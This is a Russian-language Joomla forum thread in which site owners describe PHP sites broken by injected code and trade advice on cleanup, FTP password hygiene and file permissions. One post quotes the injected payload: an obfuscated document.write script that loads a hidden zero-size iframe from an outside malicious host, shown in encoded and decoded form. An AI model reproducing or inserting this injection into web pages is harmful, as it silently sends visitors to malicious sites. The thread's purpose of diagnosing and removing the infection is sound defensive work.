Умерли сразу 10 сайтов... Чтобы это могло быть? - Joomla 1.5: Общие вопросы

Сразу больше 10 сайтов на Joomla перестали работать. Выводится ошибка

Parse error: syntax error, unexpected '<' in /home/users/v/bla-bla-bla/domains/bla-bla-bla.ru/index.php on line 89

89 строка в версии 1.5. На других версиях строка иная.

Сейчас оказалось, что все сайты на PHP легли. Жив только голый HTML.

Что это может быть? Вирь?

Хостинг - Джино.....

а ты оплатил php? у этого хостера его надо оплачивать как отельный элемент.

На всех сайтах в файлах   index.php в самом конце появился какой-то левый код

<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%57%49%44%54%48%3A%20%30%25%3B%20%48%45%49%47%48%54%3A%20%30%70%78%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%79%66%75%63%6B%69%6E%67%2D%70%75%73%73%79%2E%63%6F%6D%2F%74%79%72%65%6B%2F%3F%74%3D%35%22%20%66%72%61%6D%65%42%6F%72%64%65%72%3D%30%20%73%63%72%6F%6C%6C%69%6E%67%3D%6E%6F%20%0A%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3E%3C%2F%49%46%52%41%4D%45%3E'));
//-->
</Script><!-- c65 -->


Ну или в нормальной кодировке:

<IFRAME style="WIDTH: 0%; HEIGHT: 0px" src="http://my***ing-pussy.com/tyrek/?t=5" frameBorder=0 scrolling=no  allowTransparency></IFRAME>


my***ing-pussy  охренели......  

А некоторые мои сайты так и продолжали работать с этим левым кодом.  ППЦ.

Да, у них каждая функция отдельно оплачивается. Но я уже давно с ними, поэтому в курсе.  Причину чуть выше отписал. Какой-то левый код. Порносайт какой-то раскручивается самыми чёрными-причёрными методами.

Это червь. Вычищай все фалы index.php и index.html в корне и в папках

Все index.php прочистил. Все заработало...

Блин, вот есть же паразиты! Зла не хватает!

Вот только на долго ли вы от этого защитились?
проверяйте комп с которого на фтп лезли на фирусы, скорее всего у вас троян!
и поменяйте пароли на фтп

и не сохраняйте пароль в Вашем ftp клиенте

и не сохраняйте пароль в Вашем ftp клиенте

я сохраняю
просто нужно пользоватся средствами защиты и своевременно обновлятся!

Да на вирусы и прочую ерунду постоянно проверяюсь. Кажется всё в норме.... Я вот думаю, может ли сам червяк находиться у моего хостера? Джино, как я понимаю, не сканирует все размещённые у них сайты на наличие вирусов, червей, троянов....  Собственно вопрос получается такой - проблему однозначно следует искать у себя? Или не исключено, что черви могли завестись у хостера? Или это невозможно?

Может.

Эх, буду сейчас письма во все возможные инстанции писать. Не пожалею несколько часов, чтобы тому паразиту, который такие вещи мутит, жизнь усложнить.

Тоже самое было неск. дней назад. Parse error: syntax error, unexpected '<' in /home/priyut/public_html/index.php on line 88  - помогло удаление кода в конце индексных файлов iframe
Комп проверяю каждый день, сменил пароли. Но сегодня снова появилась та же надпись.
Откуда они берутся?

И еще - на 2-м сайте  при открытии перебрасывает на какой-то левый сайт (его адрес был прописан в iframe) Код я удалил, но все-равно перебрасывает. Не могу найти причину.
Кто-то может подсказать, где они могли прописать редирект?

До 1.5.10 обновлялись?

Дело тут не в обновлениях, видимо у вас где то на хостинге лежит червь в какой то из папок, проверте папки cgi-bin
так же злоумышленник мог получить рут сервака и тогда вам ничего не поможет, кроме самого хостера!

Тоже самое было неск. дней назад. Parse error: syntax error, unexpected '<' in /home/priyut/public_html/index.php on line 88  - помогло удаление кода в конце индексных файлов iframe
Комп проверяю каждый день, сменил пароли. Но сегодня снова появилась та же надпись.
Откуда они берутся?

И еще - на 2-м сайте  при открытии перебрасывает на какой-то левый сайт (его адрес был прописан в iframe) Код я удалил, но все-равно перебрасывает. Не могу найти причину.
Кто-то может подсказать, где они могли прописать редирект?

А какой хостинг? У меня опять такая байда началась. Только теперь всё серьёзнее. Раньше левый код добавлялся только в index.php, а теперь во все файлы с раширением php и html. Со своей стороны как мог предохранился (сменил пароли на ftp, основательно проверил машину антивирями). Грешу на хостера.  У вас какой хостинг?

Такая же беда. Умерли три сайта, я их даже сделать не успела. Только позавчера установла Joomla, сегодня ничего не работает, ни сайт, ни админка.
Для сайта лезет строка
Parse error: syntax error, unexpected '<' in /home/lerusru/public_html/my/index.php on line 89
Для админки
Parse error: syntax error, unexpected '<' in /home/lerusru/public_html/market/administrator/modules/mod_menu/menu.php on line 223

Что за фигня?(((
На компе стоит касперский, регулярно проверюсь.

Зы. ССылка верхнего поста не работает.

Для сайта лезет строка
Parse error: syntax error, unexpected '<' in /home/lerusru/public_html/my/index.php on line 89
Для админки
Parse error: syntax error, unexpected '<' in /home/lerusru/public_html/market/administrator/modules/mod_menu/menu.php on line 223

залейте поверх оригинальный дистрибутив Joomla и поменяйте пароли на ftp...

Так этот червь и новые пароли стащит ((( Как устранить корень зла?

Хостинг платный, РБК. Встроенный антивирус на хостинге ничего не обнаружил.

Так этот червь и новые пароли стащит ((( Как устранить корень зла

проверить локальную машину на наличие вирусов, не хранить пароли в ftp клиенте и прочие примитивные меры защиты (что дают 90% безопасности)

http://joomlaforum.ru/index.php/topic,62856.msg365229.html#msg365229

эх... я в этой теме написал как избавится от напасти, а ее стерли, больше писать не стану лень ;(

проверить локальную машину на наличие вирусов, не хранить пароли в ftp клиенте и прочие примитивные меры защиты (что дают 90% безопасности)

Локальную машину регулярно проверяю лицензионным Касперским,всё чисто.
В ФТП-клиент пароли не записывала, они могут там сохраняться сами при вводе? У меня FileZilla, где она может сохранять пароли?

Локальную машину регулярно проверяю лицензионным Касперским,всё чисто.
В ФТП-клиент пароли не записывала, они могут там сохраняться сами при вводе? У меня FileZilla, где она может сохранять пароли?

если у вас заражаются файлы index.html & index.php, то просто установите обновление из дистрибутива Joomla на файлы права 444 и будет вам счастье, да кстати на конфигурационный файл аналогично 444 права!